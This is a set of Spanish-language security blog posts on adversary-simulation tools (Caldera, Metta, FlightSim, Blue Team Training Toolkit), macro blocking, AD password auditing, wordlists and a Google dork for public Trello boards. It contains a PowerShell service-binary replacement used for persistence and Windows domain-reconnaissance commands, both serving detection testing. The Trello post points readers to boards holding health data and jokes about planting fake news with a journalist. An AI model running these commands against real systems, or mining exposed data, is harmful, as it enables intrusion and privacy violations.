Quantcast
Channel: INSEGUROS Seguridad informática
Viewing all 510 articles
Browse latest View live

Caldera... Simulación de adversarios a golpe de click 1/n

$
0
0
Estimados amigos de Inseguros !!!

Vamos a empezar con el concepto de simulación de adversarios para adentrarnos un poquito más en este mundo con una herramienta concreta, en esta caso, Mitre Caldera.

El concepto es muy sencillo y lo que estamos en los equipos "defensivos" o delante de un SIEM o similar estamos acostumbrados. Los famosos Use case, el ruido !!!

Si tu tienes una alerta en el SIEM que detecta un ataque de fuerza bruta horizontal... tendrás que probarlo? nosotros lo llamamos "hacer ruido", generar los eventos, reproducir el ataque de una manera controlada para comprobar si realmente estamos detectando o no. Mejorar la detección, el ataque, al final es parte del ciclo de mejora de la defensa.


Con los ejercicios de simulación conseguimos esto, preparar y entrenar no solo los sistemas sino al personal ante eventos conocidos.

Al final, estás haciendo ese Purple Team o escenarios mixtos ataques/defensas.

Como ya he comentado en alguna charla, muchas veces la información que nos deja un Red Team o servicio ofensivo es de alto valor, pero puestos a trabaja la información, necesitamos correlar mucha información, sobre cómo ha funcionado el sistema defensivo, que rastros ha dejado, que medidas se han tenido que evadir con el Red Team, como se van a implementar medidas que corrijan los hallazgos, pero no solo los encontrados, sino en el tiempo, los futuros fallos de similar índole...

El uso de esta herramienta, Mitre Caldera nos gusta mucho porque es muy sencilla de desarrollar y se ciñe a nuestros propósitos.

Básicamente es una interface web para controlar un RAT, una herramienta de administración remota, un backdoor !!! con el que pasarle comandos al sistema.

Mediante comandos del sistema, bien sean bash, shell de Windows/Mac, powershell podemos replicar ataques conocidos, y ejecutarlos de manera controlada, añadiendo fases, recogiendo información útil para ser usada a posteriori...

El framework viene con una serie de TTP definidos, con el standard del MITRE, lo que nos "anima" a seguir con esta nomenclatura, o no...

Vamos a crear un pequeño ejemplo práctico y así puedes ver como va

A mi personalmente me gusta realizar la instalación de la máquina a "mano", sin docker, cosas de mi inexperiencia, pero si ya tengo una máquina virtual en dos clicks gracias a Azure, me de lo mismo liarme 5 minutos a instalar cositas, y así aprendo de paso.

Siguiendo los rigurosos pasos del documento de instalación me hago con el componente servidor.


La instalación me ha costado unas pocas gestiones, porque es un proyecto que está en cambio constante, que usa versiones 3 de python, y que no soy muy experto en estos menesteres.

La pantalla inicial me produce tal satisfacción que me remito a ella:



Siguiendo los preceptos de la aplicación, tenemos dos vías de "infectar" nuestras máquinas o sistemas a testear. Mediante un comando "del sistema" tipo ssh o powershell, o accediendo simplemente a la url con el binario. Muestro la opción del powershell.



Realizo alguna infección más y procedo con el panel de control a ver las distintas opciones.

Al final, esta parte es muy importante porque es el componente RAT el que va a ejecutar los trabajos.

Vamos a simular una técnica de persistencia basada en la técnica Mitre T1031 de modificar un servicio existente.


El sistema nos muestra el comando que subyace con esta técnica:

- id: 52771610-2322-44cf-816b-a7df42b4c086
  name: Replace a service binary with alternate binary
  description: |
    This is an example technique. snmptrap.exe should be changed in the command
    below with the new desired service binary. Depending on the value of
    host.service.modifiable this ability can damage the target system.
  tactic: persistence
  technique:
    attack_id: T1031
    name: Modify Existing Service
  platforms:
    windows:
      psh:
        command: |
          $s = Get-Service -Name #{host.service.modifiable};
          if ($s.status -ne 'Stopped') { Stop-Service $s };
          $exe = (Get-ItemProperty -Path "HKLM:\System\CurrentControlSet\Services\#{host.service.modifiable}").ImagePath.split()[0];
          $path = (Resolve-Path $exe).Path;
          Copy-Item -Path $path -Destination ($path + ".saved");
          Copy-Item -Path "C:\Windows\System32\snmptrap.exe" -Destination $path
        cleanup: |
          $exe = (Get-ItemProperty -Path "HKLM:\System\CurrentControlSet\Services\#{host.service.modifiable}").ImagePath.split()[0];
          $path = (Resolve-Path $exe).Path;
          If (Test-Path ($path + ".saved")) {
            Remove-Item $path;
            Move-Item -Path ($path + ".saved") -Destination $path
          }

Ahora creo un Adversary para ir añadiendo distintas TTP al ataque. Siguiendo el ejemplo, vamos a configurar la técnica 1031 que habíamos visto anteriormente.


Ahora realizamos la operación a simular, es decir, con la definición o uso de nuestra técnica y las fases, vamos a establecer el grupo de objetivos y a lanzar la operación.


Con el resultado de la operación tenemos un informe en formato gráfico y json, donde podemos ver que no se ha podido realizar la técnica, debido a que los dos equipos no tenían ningún servicio vulnerable para modificar con los permisos que se estaba ejecutando el RAT.


Ahora vamos a lanzar una operación con un conjunto de TTP´s más "cantosos".


Como puedes ver, en esta operación vamos a parar la recolección de logs, conseguir información del sistema, buscar entornos wifi, apaga el adaptador... y un conjunto de técnicas a las que engloba como "noisy neighbor" :-)

Después de un rato, me doy cuenta que efectivamente en mi mac me había desactivado el wifi xDDDDD

platforms:
    darwin:
      sh:
        command: |
          ./wifi.sh off
        cleanup: |
          ./wifi.sh on
        payload: wifi.sh
    linux:
      sh:
        command: |
          ./wifi.sh off
        cleanup: |
          ./wifi.sh on
        payload: wifi.sh
    windows:
      psh:
        command: |
          .\wifi.ps1 -Off
        cleanup: |
          .\wifi.ps1 -On
        payload: wifi.ps1


Fíjate en esta descripción de técnica como implementa un comando que requiere de un fichero, se denomina payload y debemos de especificarlo. Es muy sencillo subirlo al server y que el agente lo descargue en la ubicación por defecto que decidamos.

El resultado de la operación, aparte de tirarme el wifi :-) es el siguiente:


Aunque tengamos el report gráfico, la recolección de lo que llama facts o hechos la tenemos en detalle en el fichero de reporte json.


Siguiendo el propósito de nuestro test, vemos si nuestras herramientas de recolección de información están obteniendo la información que deseamos, y si vemos en nuestro SIEM las esperadas alertas a la detección de los ataques realizados.

Si todo ha ido bien, nuestro equipo blue team habrá podido ver/analizar que pasa, y si no, no nos habremos enterado de nada :-)


Al final, una herramienta muy versátil y que dota a los equipos de test muchas facilidades a la hora de realizar las pruebas.

Espero que os guste, que la trabajéis. Haremos más cositas seguramente en otras entradas.

Gracias por leerme.


Uber Metta...Simulación de adversarios 2/n

$
0
0
Estimados amigos de Inseguros !!!

En otro artículo de la serie introducimos el concepto de simulación de adversarios con el software Caldera. Te refresco, lanzar ataques de manera controlada sobre un sistema para evaluar sus capacidades de detección.


Al más puro estilo caldera, con línea de comandos, hoy presentamos Uber Metta.

El sistema Metta trabaja con Vagrants, lo que son un conjunto de configuraciones para desplegar imágenes virtualbox con un setting concreto. Lo que podría ser un contenedor basado en VirtualBox.

La parte de instalación de muy sencilla, podemos seguir el tutorial del autor. 

Para este prueba, vamos a usar un Vagrant con Windows 10, en concreto el siguiente que os acompaño y que usamos para algunas cosas. 

Uses el que uses, como indica el autor, habilita la comunicación hacia él mediante WINRM, al menos, para poder operar con las pruebas que trae por defecto Metta.


https://github.com/uber-common/metta/wiki/Vagrants
vagrant init StefanScherer/windows_10
vagrant up

Al final, el autor de la herramienta "evita" la parte de RAT de Caldera con el despliegue de una máquina Windows 10 con Sysmon para probar las detecciones. No es lo más elegante ni funcional, ya que tienes tu que acceder al Windows virtualizado para ver a mano los logs, los eventos que han aparecido, pero bueno, demasiado ha hecho y agradecidos estamos !!!

El placer de las cosas bien hechas aparece:


Lo que realmente estamos lanzando son las acciones descritas en el yaml.

enabled: true
meta:
author: cg
created: 2017-06-01
decorations:
- Purple Team
description: On Target Recon Atack Simulation.
link: https://carnal0wnage.attackresearch.com
mitre_attack_phase: Discovery
mitre_attack_technique: Account Discovery
purple_actions:
1: cmd.exe /c net user
2: cmd.exe /c net user /domain
3: cmd.exe /c net localgroup administrators
4: cmd.exe /c net view
5: cmd.exe /c net view /domain
6: cmd.exe /c net groups \"Domain Admins\" /domain
7: cmd.exe /c net use
8: cmd.exe /c net share
9: cmd.exe /c ipconfig /all
10: cmd.exe /c tasklist /v
11: cmd.exe /c gpresult /z
12: cmd.exe /c nltest /dclist:corp
os: windows
name: On-target Recon Simulation
uuid: 017df153-470e-43d6-8e91-24c6b7cf62c4
En este caso, muy sencillitas, y tiene algún repositorio con algunas cosas graciosas.

Al final, no deja de ser una manera de ejecutar los comandos, lo que denomina las Purple Actions.

Habrá que ver como evoluciona el proyecto.

Simulación de adversarios... FlightSIM 3/n

$
0
0
Estimados amigos de Inseguros !!!

En este tercer episodio de la simulación de adversarios, voy a comentar la herramienta FlightSim, que no es un simulador de vuelo... es una herramienta de generación de "ruido" esta vez de tráfico de red para comprobar nuestras capacidades de detección.


Como vimos con Caldera, Infection Monkey hace unos años o recientemente Uber Metta, Flightsim genera distintos tipos de eventos, bueno eventos no, genera las actuaciones que deben generar eventos en nuestros sistemas. Algunos de los módulos que tienen, y que por el nombre describen muy bien el trabajo que hacen son:

ModuleDescription
c2Generates a list of C2 destinations and generates DNS and IP traffic to each
dgaSimulates DGA traffic using random labels and top-level domains
scanPerforms a port scan to random RFC 5737 addresses using common ports
sinkConnects to random sinkholed destinations run by security providers
spambotResolves and connects to random Internet SMTP servers to simulate a spam bot
tunnelGenerates DNS tunneling requests to *.sandbox.alphasoc.xyz

La instalación es muy sencilla, podemos hacerlo por github o usando las comodidades de GO.

Los comandos son muy sencillos y podemos usar la opción -dry para que genere los datos sin realizar el tráfico de red. No vayas a probarlo sin avisar y le des el fin de semana al SOC.

Yo por si acaso activo las capturas de red a ver que hace el simulador...




Una herramienta muy sencilla. Por poco que puedas leer el lenguaje GO y puedas ver los módulos, podrás adoptar la ejecución a los parámetros que te interesen.

Por cierto, échale un vistazo al código, porque para algunas cosas se va contra la API de los programadores... y lo mismo estamos siendo hackeados nosotros.

Espero que te guste y lo uses !!!


Una sencilla...bloquear Macros... Caso Emotet

$
0
0
Estimados amigos de Inseguros !!!

Hace ya unas semanas que llevamos sufriendo una oleada de ataques del troyano tipo Emotet.

Sin entrar en detalles, es un malware que por lo general esconde un dropper, un programa malicioso que se descarga el auténtico "bicho" del malware. En esta ocasión un troyano bancario con el fin de intentar obtener claves y envirular al resto de mortales y conocidos mediante una propagación basada en contactos del correo. Hay mil artículos al respecto mejor explicados que yo.


Lo que estamos aconsejando en los centros de operaciones y empresas prestadoras a nuestros clientes es que bloqueen por defecto el uso de Macros en los documentos de ofimática.

Esto suscita muchos impedimentos, ya que muchas empresas usan ficheros, sobre todo Excel, para realizar pequeños ( o grandes) procesos de negocio y usarlos como base para pintar dashboards, informes y cosas así.

Al final es una función muy interesante de la ofimática, pero que por desgracia está siendo empleada como mecanismo de evasión de antivirus para realizar las maldades de los cibercriminales.

Mi pequeño consejo quizás lo conozcas, pero mucha gente no. Estamos hablando de soluciones de hace 20 años...

Usar Gpo !!! si !! las políticas de grupo de toda la vida. Hay plantillas administrativas, las ADMX de muchos productos, que nos permiten configurar mediante Group Policies de dominio ciertos aspectos de software de terceros, no solo del sistema operativo. Para el caso de Office 2016 podemos descargarlas desde aquí.

Pero como te digo, hay plantillas administrativas para mucho software comercial, por ejemplo, Firefox.

Bueno seguimos, una vez tenemos el fichero ADMX descargado, copiamos el contenido de las plantillas a c:\windows\policydefinitions\ y ya las tenemos disponibles en el editor de directivas de grupo.

Aquí cabe la pena hacer un inciso. Vamos a bloquear el uso de macros en ficheros Word por ejemplo, pero vamos a establecer unas zonas de confianza o trusted zones para que los usuarios SI puedan ejecutar macros en ficheros Word de esa ubicación.

Es una buena medida de seguridad que permite cierta usabilidad.

El proceso es muy sencillo.



Otro consejo para los más iniciados en el ámbito de la ciberseguridad, es que conociendo este "comodín" para hacer un "bypass" del bloque de macros, es común que el malware intente alterar esa rama del registro para dotar de "zona de confianza" al fichero.

Muy recomendable monitorizar los cambios de la siguiente rama del registro.

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\Trusted Locations


Espero que os sirva, gracias por leerme !!!

Blue Team Training Toolkit... simulación de adversarios

$
0
0
Estimados amigos de Inseguros!!!

Seguimos poniendo a prueba nuestros sistemas con la simulación de adversarios. Este artículo pertenece a una serie más completa con distintas aproximaciones y ejemplos, así como herramientas y soluciones completas. Puedes leer el artículo de Caldera, de Uber, Flight Simulator...

En el turno de hoy, vamos con una herramienta denominada Blue Team Training Toolkit, muy descriptivo el nombre.



El software tiene una estructura de menús muy parecida a metasploit, en la que podemos hacer show modules, show options, set valor y cosas así, muy intuitivos.

Tiene 3 funciones claras, simulación de peticiones de malware a C&C, retransmisión de capturas de red y uso de ficheros sospechosos por imitación de MD5. Vamos a ir instalando y usando la aplicación para ver las funciones en detalle.

Una vez solventado algún pequeño problema con el instalador y python tenemos acceso al framework.


Empezamos como es menester pidiendo ayuda a la aplicación, no al vecino. Un Help nos posiciona correctamente ante el problema.


Voy a optar por la opción de generar un nuevo token con apisignup para la API. El servicio es gratuito, pero tiene distintas opciones de subscripción para comercializar el producto. Voy a optar por registrarme para la versión community, que si bien no es la más completa, si es gratis.

Al más puro estilo Metasploit, voy navegando por los módulos para ver que me ofrece la herramienta. Show Modules está bien.

Para esta primera prueba vamos a usar Maligno, una estructura cliente servidor para emular las conexiones que hace el malware hacia un C2, reproduciendo metadatos conocidos para testear nuestra capacidad de detección, que es de lo que se trata...



Seteamos el servidor que hará de C2 con la ip indicada y hacemos un show profiles. Veremos la lista de perfiles de imitación que tenemos disponibles, con la salvedad de que algunos son de pago, 1$ creo recordar que cuestan, pero vamos a elegir uno gratuito, que es gratis xD.


Hacemos un download nuclear, luego un set profile nuclear y luego hacemos un genclient para generar el cliente que realizará las conexiones contra nuestro Command And Control.

Si nos vamos a la carpeta profiles podremos ver el código en python de la actividad que vamos a recrear relacionada en este caso con nuclear.


También es interesante ver el fichero que crea cliente.

Ahora es el turno de irnos a nuestra máquina "cliente" y ejecutar el python.

Hemos probado varias simulaciones y hemos puesto un snort en la máquina para ver la detección.



Depende del conjunto de reglas que tengas tendrás unas detecciones u otras, pero al final, el concepto es simular la comunicación con el C2.

Vamos a probar otra opción interesante de la herramienta, la posibilidad de gestionar la retransmisión de ficheros pcap, cambiando muy fácilmente las direcciones ip y mac.



Y ahora vamos a indicar que 192.168.1.3 se convierta en 172.16.1.3



Lo bueno de esta funcionalidad es que podemos usar cualquier pcap que nos apetezca, de los muchos que hay disponibles para su estudio.

Otra de las opciones que implementa esta herramienta es la de usar las colisiones matemáticas del algoritmo MD5 para generar hashes, o mejor dicho, ficheros con el mismo hash que muestra clasificadas como maliciosas, como pueda ser una shell inversa con netcat, mimikatz, etc.


Con este módulo solo podemos bajar el fichero , no tiene ninguna interacción más.

Me parece un framework muy potente y que funciona bien, si bien es un poco más complejo de extender que los demás de la serie, pero cualquier persona con conocimientos de python podrá simular las típicas cabeceras usadas en ataques web y recrear ataques de este tipo.

Espero que os haya gustado y próximamente seguimos con otro capítulo !!!

Gracias por leerme.

En especial, este capítulo se lo dedico a Sergio, para saber si me lee el mamón y me lo dice xD



Microsoft Security Compliance KIT

$
0
0
Estimados amigos de inseguros !!!!

En la entrega de hoy voy a comentar algo que lleva tiempo rulando por los sistemas de la compañía de Seattle pero que no había documentado por aquí, el Ms. Security Compliance Kit.


Como puedes apreciar en la descripción, es un kit de herramientas que te permiten realizar una auditoría de cumplimiento de tus estándares de seguridad, es decir, si estás aplicando bien las políticas que crees que estás aplicando.

Es un producto gratuito disponible para sistemas operativos > 2012r2.

En esta prueba vamos a "ejecutarlo" sobre un Dc Windows Server 2019....

Lo primero que voy a hacer es ver la documentación, un fichero excel con las configuraciones que me recomienda para cada versión de sistema operativo y su role.


Puede que estés contento con el resultado que te proponen, pero revisalo muy bien.

Es momento de irnos al editor de directivas de grupo y crear una, darle a importar, e importar el setting que nos corresponde. Sencillo !!!





Con este proceso tenemos cargadas ( que no linkadas a ningún objeto) las directivas de grupo por defecto que Ms nos recomienda...

Pero seguro que esto te da rollo, a mi me lo da. Mejor será tener una herramienta por ejemplo, Policy Analyzer dentro del kit, que le pases varias GPO´s, y te muestre en amarillo los cambios puntuales, para re-comprobar qué estás cambiando...



Interesante eh !! te puedes animar a cargar tu GPO, la deseada, y puntualmente cargar los elementos uno a uno según te interese. Yo lo haría así !!!

Microsoft ha pensado en todo, y tienes otra herramienta en el kit denominada LGPO para el manejo de las GPO por líneas de comandos, para los equipos fuera del dominio... para cargar, exportar, guardar configuraciones, también muy interesante.

Espero que os guste y os quite el miedo de usar estas herramientas y fortificar los servidores y equipos.

Atentos a la próxima entrada que promete un premio xDDD

Gracias por leerme


Symon extension para visual code by dark operator

$
0
0
Estimados amigos de Inseguros !!!

En el capítulo de hoy una breve reseña a una herramienta, o más bien extensión, en honor del crack Carlos Perez @darkoperator.

Se trata de una pequeña extensión para Visual Studio Code que nos ayuda a la hora de escribir configuraciones Sysmon. Muy sencilla y suficientemente bien explicada con sus gifs.


Solo eso, animaros a usar VSCode como editor de ficheros y esta magnífica extensión.

Gracias por leerme

Reto para instituto

$
0
0
Estimados amigos de Inseguros !!! Este es un pequeño reto para unos alumnos, que no os de mucho hambre !!! xD

https://mega.nz/#!4yhGXATa































!R2zc4vL5zkqOdRoEERZWoJp2sEXG0_X_AZiE5aC-gl8

VEO TRELLO, que ves ? Una cosita... y qué cosita es: Indexado de paneles públicos muestra información sensible

$
0
0
Estimados amigos de Inseguros !!!

En el post de hoy voy a mostraros un pequeño truco de búsqueda en Google, ya sabéis, un DORK que publicó hace unos días el señor https://twitter.com/xKushagra/ en donde podíamos buscar información indexada por Google en tableros PUBLICOS mediante el sencillo DORK: inurl:https://trello.com AND intext:COSAS.

Para los que no lo sepan, Trello es un servicio en la nube que permite crear paneles de trabajo con distintas etiquetas, fases, al estilo de soporte para metodologías Canvas. Es muy potente y tiene muchas opciones.

Antes del contenido, un poco de chapa. Cuando usamos servicios en la nube como este o cualquier otro, confiamos en la seguridad del proveedor. Es MUY importante saber con quien estamos operando y cual es su nivel de madurez respecto a calidad del servicio y seguridad.

Estoy harto de ver gente con servicios low cost implementados en empresas y que luego adolecen de tremendos fallos, tanto de productividad, disponibilidad como de seguridad.

Al final todo en esta vida se paga, y cuando te vas a un proveedor de soluciones en la nube potente, la diferencia suele ser abismal. En este caso ha sido solo un pequeño "fallo de concept" en permitir a Google indexar el contenido, aunque mirándolo bien, es el usuario el que publica Paneles de manera descontrolada... El resultado es peligroso y doloroso para algunas organizaciones. Es que las empresas no buscan su nombre en Google todos los días?...

Probando cosas de mi región encontré panales graciosos:



Esta gente sospecho que ha tenido algún que otro incidente de seguridad en el pasado o gatillazo :-)

Otro panel curioso que he visto es el de una periodista Mexicana que va recopilando información y luego escribe post para distintos medios. Sería gracioso inventar alguna noticia y hacerle el desarrollo hasta ver donde llega xD...


Un panel entretenido también y peligroso es este, un sistema de gestión de mutuas o similar en desarrollo en el que trabajan con datos reales, datos de salud, partes de accidentes, ingresos y demás.



Más de lo mismo





Como puedes ver, hay información de todo tipo.

Solo es cuestión de jugar con la palabra que buscas y echarle un ratito.

Espero que busques bien tus empresas, datos y contactos y sobre todo, se consciente del riesgo que tiene publicar información en servidores ajenos.

Gracias por leerme !!!

Trabajo en Ciberseguridad: Soy rico !!! pero mírate al ombligo...

$
0
0
Estimados amigos de Inseguros!!!

En el artículillo de hoy voy a opinar un poco de este tema, el de lo salarios y en concreto en el mundo de la ciberseguridad.

Para ponernos en el contexto, me refiero a los notícias absurdas de que faltan miles de profesionales en ciberseguridad, de que son las profesiones del futuro, y sobre todo sobre el boom de los salarios.

En primer lugar, decir que soy un defensor de que los sueldos de la informática son bajos, por lo general, incluidos los de la ciber, por mucho que se lea.


Pero ahora quiero ser un poco más crítico con nosotros mismos. Con los profesionales de la ciberseguridad, porque hay veces en las que soy "empleado" y otras veces con "el que contrata". Unas veces pido y otras doy, y es bueno poner todos los elementos sobre la mesa para poder juzgar la situación económica de los sueldos, no solo desde el punto de vista del que nos interesa a cada uno. Creo que esto es fundamental, el poder ver problema desde varios prismas, y no desde el que me interesa a mí como individuo.

Voy a empezar por la ubicación. La ciudad donde vivas. Cada país, cada ciudad, tiene unos costes de vida distintos. No es lo mismo vivir en Madrid que en Murcia. Esto es una realidad, y las empresas lo usan. Pongo un ejemplo, mejor dos, de ciudades y empresas que lo aprovechan. Málaga y Alicante,  están apostando mucho por el desarrollo de parques empresariales y colectivos para atraer talento. Como va esto? La globalización, para lo bueno y lo malo, tiene muchas cosas. No solo es bueno para comprar en Aliexpress o amazon cosas quitándonos al proveedor local, sino que ahora el concepto de proveedor local apenas tiene sentido.

Empresas de Noruega, Finlandia, países que por lo general no tienen buen clima... buena gastronomía... les salen MUCHO más rentable atraer talento con oficinas en la soleada Málaga que en Trondheim. Incluso con un 20% menos de sueldo, van a tener más poder adquisitivo, mejor calidad de vida. Esto es algo que está ocurriendo, la calidad de vida del sur de España se está poniendo en valor para muchas empresas, y se está aprovechando.

Si es moral o no, si habría que favorecer el desarrollo local, todo eso está muy bien, pero entonces no compres en aliexpress ni en pc componentes... ni exportes a otros países... y ya de paso mira esta postura con Trump cómo nos afecta.

Respecto a la formación. Es VITAL estar formado. Pero no como tu te quieres formas, sino como lo pide la industria. Si para ser funcionario o para trabajar en X puestos hay que tener una carrera, en el mundo TIC las certificaciones son muy necesarias. Soy un claro defensor de estas, y si bien los masters están muy bien y de moda, conozco MUY pocos que realmente preparen bien a los profesionales, sin embargo, si eliges medio bien, con el precio/tiempo de realizar un master, puedes tener certificaciones de la industria que te aporten mucho más.

No que te aporten como persona... como ser del espacio... NO, que te aporten para encontrar un buen trabajo y salario.

Por otro lado, la curva de la formación, para mi, tambien es muy importante. ¿Qué es esto? Con 22 años y una pasión creciente por la infosec. seguro que haces muchas acciones formativas, pero qué pasa cuando tengas 30? La vida no es siempre fines de semana de largas noches hackeando máquinas, pasando CTF´. La vida con 30 años ( por poner una cifra) es de largas noches sin dormir con el niño malo, con obligaciones familiares, con cargas horarias de trabajo importantes, y al final, no es tán fácil mantener esa curva de formación, de actualización.

Lo he visto MIL veces, gente que llega, se come el mundo, encuentra trabajo y a los dos años ya no es que no destaquen, es que ODIAN su trabajo, porque se ha convertido en trabajo.

Mantener un programa activo de formación y renovación es FUNDAMENTAL para ser un buen profesional en la informática y en la ciber, por eso creo que esto debe reflejarse en el CV. Está claro que no va a ser lo mismo con 20 que con 40, pero asistir a eventos, algún curso de vez en cuando... es más que necesario. Carrera+master+CCNA ( por decir algo) con 23 años es lo normal !!!!no es algo TOP.

Entonces, en tu empresa, te pagan formación? porque el salario económico es algo importante, pero tu tiempo para evolucionar, crecer, investigar, formarte, es algo VITAL, porque lo que puede ser bueno para hoy, puede ser malo para mañana: estancarte y aburrirte de por vida.

Experiencia, que decir de la experiencia !!! si no la tienes no la ganas, si no la ganas no la tienes...
La vida por suerte suele ser muy larga, y la laboral más. Un año, dos años, tres...cinco, diez !!! el tiempo pasa. La experiencia es un grado se dice, y los que no la tienen la cuestionan, y los que la tenemos la ponemos en alza. Vamos a darle una importancia media, para ser justos, pero la tiene.

Contando con que una curva buena de desarrollo profesional e intelectual puede llegar a los 40/50 como cotas más altas, tener 3 años de experiencia en una herramienta es importante, pero no lo es todo.

Tipo de empresa, FUNDAMENTAL, me parece lo más importante. No es lo mismo estar en un consultora por proyectos que en un cliente final. NO HAY COLOR. Empresas que te usan dos años en un proyecto, si se renuevan sigues, y sino, te vas a otro... esas empresas cuando te forman? al final si criticas el modelo de que la localización es una excusa para pagar menos, tambien pensaras que el modelo contrata es un modelo en el que se aprovechan de ti, para ganar dinero directamente de tu trabajo?.

Otro de los factores que me comenta la gente que les parece fundamental es la proyección. Es decir, no me importa tanto cuánto me vas a pagar ahora, pero quiero saber cuanto me vas a pagar, si todo va bien, dentro de 3 años, y dentro de 5... Esto en empresas de proyecto es prácticamente IMPOSIBLE saber. En un cliente final, si puedes saber cuales son los techos de ascensos funcionales y económicos. Conocer que dentro de 3 años puedes estar muy bien, a riesgo de estar 2 años no tan bien, económicamente, pero con otras ganancias, puede estar muy bien. Es más, los jóvenes lo demandan.

Por último, dentro de estas reflexiones más o menos acertadas, y quizás personales, está el mega-ego de la ciberseguridad. Cualquier cosa que se venda como ciberseguridad está de moda, y la gente se aprovecha de ello.

Desde cuanto una persona con 3 años de experiencia es senior? yo creo que una persona es senior cuando lleva 10 años, 15, 20, pero 3?

Usar una herramienta de ciberseguridad, como un SIEM o un antivirus no te hace experto en ciberseguridad. Ni tan siquiera haciendo auditorías todos los días te haces experto en ciberseguridad. La ciberseguridad, como la informática, es muy amplia, y requiere de muchos años y estudio para intentar comprender al máximo la realidad y aportar valor.

Y qué decir de otras capacidades?¿ Hay empresas en las que puede que trabajes como técnico, pero que en ciertas ocasiones tengas que hacer de gestor de equipo, de comercial ante un cliente, de pre-venta con un comercial... relaciones públicas.. hay gente que no tiene ninguna cualidad más allá de la técnica, que son máquinas en lo suyo, pero no les pidas más.

Entonces, dicho esto, vamos con lo sueldos, con los números.

Pero no vamos a mirarnos al ombligo, a nosotros mismos, vamos a mirar el mundo.

Cuanto gana un ingeniero agrícola con 4 años de experiencia? y un licenciado en ADE? un enfermero? un químico? etc

El problema de la falta de sueldo es general en España, y el sector ciberseguridad está bien pagado en consideración con otros sectores.

Un junior con menos de 3 años de experiencia puede estar cobrando 22.000/27.000 euros. Esto es un PEDAZO de sueldo en cualquier ciudad normal para una persona que acaba su ciclo/carrera y hace sus primeros pasos en el mundo laboral.

Pasar de los 27k hasta los 35k puede ser labor de ya unos 5 años de experiencia.

Con una carrera más o menos lanzada, de 10 años, cobrar alrededor de los 45.000 euros creo que es habitual, pero ya en las provincias no. En la inmensa mayoría de España no. Por el coste de vida, y por el tipo de empresa. Os voy a poner un ejemplo, en Murcia, no hay empresa que tenga un CISO. NINGUNA. Hay CIO`s, pero CISO´s como tal exclusivo NO, porque hay unas 10/20 empresas que quizás lo necesiten, pero aún no hay madurez. En Alicante igual, en Albacete igual... Málaga... Córdoba... Gijón... A Coruña... Quitando ibex 35 y grandes grandes grandes empresas, no hay puestos de CISO, ni mucho menos de técnicos que cobren más de 45k.

Hablo de la norma, de lo extendido. Hay chavales que con 2 años de experiencia cobran 120k desde casa... pero no todos somos así, no todos somos genios, esto hay que mirarlo.

Vamos a ver los Pure Players de la ciber. Cuánto facturan? porque oyes nombres de empresas muy grandes en ciberseguridad, pero ves su facturación, y es de empresa de informática de "toda la vida" o casi... y esto al final repercute en los sueldos.

Yo creo que hay MUY poca gente que gana más de 50.000e en una empresa española no Ibex o multinacional como experto en ciberseguridad.



En este punto voy a meter una imágen de una pequeña encuesta en la red en la que efectivamente, se demuestran más o menos mis sospechas: la gente fuera de Madrid no gana mucha pasta...

Vete a Barcelona, segunda ciudad económicamente, Bilbao, Sevilla, A Coruña, Málaga, Murcia... Mira a ver cuanto se cobra. y esto es ASÍ. Lo era hace 20 años y lo sigue siendo.

No quiero decir que defienda que se pague menos en unos sitios que en otros, todos los que me conoceis sabeis mi enfoque en cuanto al centralismo y a la calidad de vida de vivir en Murcia, sino que es algo que se hace, y que tiene un % de justificación. Un pequeño porcentaje, pero al final vivir en la contaminada y saturada Madriz, con 90 minutos de media diaria de desplazamientos para ir a trabajar, con el precio de la vivienda, es normal que se pague algo más.

Al final de todo esto, me gustaría que te quedases con varios conceptos, principalmente que un salario es una mezcla de varias cosas y que no porque seas "ciber"algo eres un crack. un máquina.

Por último, relativizar los precios de los servicios de ciberseguridad, que si bien son caros, depende mucho de quien los haga... al final... como cualquier otro sector.

Gracias por leerme.


Blue Team: auto-fuerza-bruteate !!! Active Directory

$
0
0
Estimados amigos de Inseguros !!!

En el post de hoy vamos a hablar de un concepto y herramienta defensiva relacionado con la fuerza bruta. Me refiero a realizar estas pruebas contra el directorio activo que gestionamos.

Imagina que quieres lanzar un proceso de fuerza bruta contra TODO tu AD. No existe, o no conozco, una manera de hacerlo sin que intervengan las GPO´s de bloquee de cuentas por ejemplo. Es decir, que si lanzas el ataque de fuerza bruta por ejemplo desde una IP, el AD no te bloquee el usuario destino... Si existe estaría bien saberlo.

Con una política de seguridad de contraseñas compleja, como las que conocemos, no es suficiente, o no debería serlo, para proteger la identidad de nuestros preciados usuarios de AD. Por ejemplo, una clave de 10 caracteres, alfanuméricos, que se cambie, el historial, balbalbal, está mejor que usar 12345, pero en la realidad, esta clave tampoco es segura: nombre_empresa2020!"# o similares.

Si a esto le sumas el constante chorreo de leaks de contraseñas que aparecen de ataques a terceros, tenemos una abanico de posibilidades de que un usuario esté usando una contraseña SEGURA para Active Directory pero no para un atacante.


Para esto podemos hacer varias gestiones, pero podemos aprovecharnos de la capacidad que tiene DSinternals por ejemplo para de manera controlada, autenticada... puedes exportar el contenido de tu NTDIS... de tu base de datos de usuarios del directorio, en formato NTLM. En este artículo lo vimos.

Ahora vamos a usar la herramienta bAd-Passwords del señor https://twitter.com/JakobHeidelberg que lo que hace es exactamente lo que queremos. Lee el directorio activo, pasa a NTLM una o varias listas de contraseñas y las compara.

El trabajo previo de generar una lista de contraseñas lo podemos hacer con varias herramientas, en el próximo post os paso una y una lista, o usar los diccionarios de filtraciones que hay...


De esta manera podemos auditar periódicamente si alguno de nuestros usuarios está usando una contraseña que cumple con los criterios de la política, pero que para un mega-hacker rico de la muerte podría ser fácil de adivinar.

Como siempre, espero que os guste.

Gracias por leerme !!!

Una de wordlist: The Mentalist !!!

$
0
0
Estimados amigos de Inseguros !!!

Dentro de los procesos de seguridad, tanto ofensivos como defensivos, es muy importante el trabajar con diccionarios y wordlist para fuerza bruta.

Espera, de manera defensiva? comorrrrrr !!!! Espero que hayas leído el artículo sobre como usar las listas de passwords de manera defensiva del anterior artículo...

Pero en esta ocasión vamos a centrarnos en la parte de generación de diccionarios, independientemente del uso que le des. En este blog hemos hablado hace años de herramientas como CUPPCrunch, ThaDoctor, who´s your daddy, CEWL  y en esta ocasión voy a comentar una sencilla herramienta para el mismo propósito, pero muy sencilla y gráfica. The Mentalist.


El uso es muy sencillo, es más es casi block chain !! jajajaja, usa chains, cadenas, en las que voy construyendo "condiciones" o casos sobre el texto.

La primera chain es el "input", el texto. aquí por ejemplo podríamos poner el nombre de la empresa, informático, producto, sector,etc, y podemos poner varios.

